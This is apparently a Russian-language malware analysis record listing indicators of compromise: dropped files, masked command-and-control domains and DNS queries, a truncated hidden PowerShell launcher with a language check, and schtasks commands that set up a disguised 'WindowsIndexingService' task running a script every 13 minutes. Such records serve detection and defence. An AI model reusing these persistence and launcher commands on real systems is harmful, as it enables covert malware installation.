Техническая информация
- <SYSTEM32>\tasks\windowsindexingservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsindexingservice.lnk
- C:\users\public\libraries\thumbcache_33.db
- %TEMP%\xafx909.1.tmp
- C:\users\public\libraries\thumbcache_33.db
- 'ad#.##nebrack.com':80
- http://ad#.##nebrack.com/
- DNS ASK ad#.##nebrack.com
- DNS ASK zg####iwnji0.top
- DNS ASK ot####iwnji0.top
- DNS ASK mj####iwnji0.top
- DNS ASK og####iwnji0.top
- DNS ASK z2####iwnji0.top
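- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...' (со скрытым окном). Видимое начало Base64-строки декодируется как if(((Get-UICulture).Name -match "CN|RO|RU|UA|BY") -or ((Get-WmiObject -class … — то есть сценарий начинается с проверки языка интерфейса системы; остальная часть строки на странице обрезана, поэтому дальнейшие действия по ней установить нельзя.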
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...
- '<SYSTEM32>\schtasks.exe' /delete /TN WindowsIndexingService /f
- '<SYSTEM32>\schtasks.exe' /delete /TN "Windows Indexing Service" /f
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 13 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"